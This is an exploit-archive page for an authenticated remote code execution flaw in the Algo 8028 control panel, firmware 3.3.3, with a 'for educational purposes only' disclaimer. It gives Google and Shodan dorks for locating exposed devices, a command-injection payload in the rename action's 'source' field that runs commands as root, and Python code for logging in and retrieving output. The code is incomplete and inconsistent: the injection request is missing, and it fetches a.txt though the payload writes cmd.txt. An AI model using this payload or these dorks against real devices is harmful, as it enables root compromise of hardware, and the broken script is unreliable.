Exploits / Vulnerability Discovered : 2022-06-14 |
Type : remote |
Platform : hardware
This exploit / vulnerability Algo 8028 control panel remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:"Algo 8028 Control Panel"
# Shodan: title:"Algo 8028 Control Panel"
# Date: 2022-06-07
# Exploit Author: Filip Carlsson
# Vendor Homepage: https://www.algosolutions.com/
# Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/
# Version: 3.3.3
# Tested on: Version 3.3.3
# CVE : N/A
# Exploit:
# Due to bad sanitation in http://<IP:PORT>/control/fm-data.lua you can do command injection as root
# Request: POST
# Formdata:
# action: rename
# source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;"
# target: /
def login(host, password):
url = f"http://{host}/index.lua"
data = {"pwd": password}
res = requests.post(url, data=data)
# check if html contains "Invalid Password"
if "Invalid Password" in res.text:
print("Invalid password")
return False
else:
# save cookie
global cookie
cookie = res.cookies
print("Successfully logged in\n")
return True
# get http://host/cmd.txt
url = f"http://{host}/a.txt"
res = requests.get(url)
# if "404 Not Found" in text then command was not executed
if "404 Not Found" in res.text:
print("Command was not executed (404)")
else:
print(res.text)